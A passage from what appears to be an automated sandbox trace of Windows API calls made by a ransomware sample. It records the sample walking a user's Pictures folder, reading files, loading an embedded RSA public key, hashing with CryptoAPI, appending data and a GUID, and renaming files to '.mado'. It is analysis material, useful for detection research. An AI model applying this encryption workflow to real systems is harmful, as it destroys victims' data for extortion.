RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79e00 [0207.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0207.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0207.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0207.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79dd0 [0207.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0207.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79e18 [0207.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0207.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0207.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0207.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0207.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0207.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0207.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79da0 | out: hHeap=0x2c0000) returned 1 [0207.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79da0 [0207.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0207.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0207.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79de8 | out: hHeap=0x2c0000) returned 1 [0207.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b75b98 [0207.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79e18 | out: hHeap=0x2c0000) returned 1 [0207.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0207.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0207.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b75968 [0207.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0207.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b75a80 [0207.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79da0 | out: hHeap=0x2c0000) returned 1 [0207.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b7b950 [0207.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75b98 | out: hHeap=0x2c0000) returned 1 [0207.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b819c0 [0207.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0207.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0207.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b818b8 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b819c0 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75a80 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79dd0 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79e00 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79db8 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d88 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c64e8 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81ac8 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d70 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87490 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81bd0 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75cb0 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0207.149] WriteFile (in: hFile=0x63c, lpBuffer=0x3b87c98*, nNumberOfBytesToWrite=0x113e7, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b87c98*, lpNumberOfBytesWritten=0x39cfb14*=0x113e7, lpOverlapped=0x0) returned 1 [0207.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87c98 | out: hHeap=0x2c0000) returned 1 [0207.150] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x113ec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.150] WriteFile (in: hFile=0x63c, lpBuffer=0x3b817b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b817b0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0207.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b817b0 | out: hHeap=0x2c0000) returned 1 [0207.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0207.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b7b950 [0207.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b7b950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0207.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b7bd80 [0207.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0207.150] WriteFile (in: hFile=0x63c, lpBuffer=0x3b7bd80*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b7bd80*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0207.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7bd80 | out: hHeap=0x2c0000) returned 1 [0207.150] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0207.150] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0207.151] CloseHandle (hObject=0x63c) returned 1 [0207.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xf0) returned 0x32b69d8 [0207.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x900) returned 0x3b7b950 [0207.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0207.152] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\AV Dqy0T.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\av dqy0t.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\AV Dqy0T.bmp.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\av dqy0t.bmp.mado")) returned 1 [0207.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.153] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0207.154] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9bec580, ftCreationTime.dwHighDateTime=0x1d5e25c, ftLastAccessTime.dwLowDateTime=0xc19aa780, ftLastAccessTime.dwHighDateTime=0x1d5e28a, ftLastWriteTime.dwLowDateTime=0xc19aa780, ftLastWriteTime.dwHighDateTime=0x1d5e28a, nFileSizeHigh=0x0, nFileSizeLow=0x99d9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="feUu4T3ivGnQ0tQ.jpg", cAlternateFileName="FEUU4T~1.JPG")) returned 1 [0207.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292eb8 [0207.154] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\feUu4T3ivGnQ0tQ.jpg") returned=".jpg" [0207.154] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\feUu4T3ivGnQ0tQ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\feuu4t3ivgnq0tq.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0207.154] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=39385) returned 1 [0207.154] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0207.157] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x99b3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.157] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0207.158] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x99d9, lpOverlapped=0x0) returned 1 [0207.159] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.159] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.159] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.159] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0207.160] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0207.160] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0207.160] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0207.160] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0207.160] GetLastError () returned 0x0 [0207.160] CryptDestroyHash (hHash=0x32ef238) returned 1 [0207.160] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0207.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0207.160] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0207.160] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0207.160] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0207.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.161] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0207.161] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x99d9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.161] WriteFile (in: hFile=0x63c, lpBuffer=0x3b817b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b817b0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0207.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b817b0 | out: hHeap=0x2c0000) returned 1 [0207.161] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0207.161] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0207.161] CloseHandle (hObject=0x63c) returned 1 [0207.162] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\feUu4T3ivGnQ0tQ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\feuu4t3ivgnq0tq.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\feUu4T3ivGnQ0tQ.jpg.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\feuu4t3ivgnq0tq.jpg.mado")) returned 1 [0207.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.163] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0207.164] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0334550, ftCreationTime.dwHighDateTime=0x1d5e51b, ftLastAccessTime.dwLowDateTime=0x9bc00c80, ftLastAccessTime.dwHighDateTime=0x1d5db32, ftLastWriteTime.dwLowDateTime=0x9bc00c80, ftLastWriteTime.dwHighDateTime=0x1d5db32, nFileSizeHigh=0x0, nFileSizeLow=0x1243b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FpK8.bmp", cAlternateFileName="")) returned 1 [0207.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292eb8 [0207.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x136) returned 0x336fe98 [0207.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3292eb8 | out: hHeap=0x2c0000) returned 1 [0207.164] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\FpK8.bmp") returned=".bmp" [0207.164] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\FpK8.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\fpk8.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0207.165] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=74811) returned 1 [0207.165] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0207.167] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x12415, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.167] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0207.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0207.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.168] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0207.168] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x1243b, lpOverlapped=0x0) returned 1 [0207.169] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0207.169] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.169] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.169] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0207.170] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0207.170] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0207.170] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0207.170] RtlAllocateHeap 